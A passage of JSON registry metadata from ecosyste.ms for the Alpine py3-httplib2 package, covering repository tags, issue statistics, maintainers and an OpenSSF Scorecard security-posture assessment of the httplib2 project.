ll,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-23T21:20:16.420Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.2387565661653595,"stargazers_count":7.3253220119450235,"forks_count":5.137799525077355,"average":4.6754695257969345},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.13","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T13:09:53.687Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":4,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":3.0,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":176,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-20T00:01:57.971Z","updated_at":"2023-02-20T00:01:57.971Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.13","url":"https://pkgs.alpinelinux.org/packages?branch=v3.13","ecosystem":"alpine","default":false,"packages_count":13897,"maintainers_count":231,"namespaces_count":2,"keywords_count":1898,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":599},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.734Z","updated_at":"2026-08-24T05:03:26.518Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/namespaces"}},{"id":11765538,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-08-06T14:02:04.866Z","created_at":"2025-06-07T18:22:41.021Z","updated_at":"2026-08-21T19:59:47.192Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url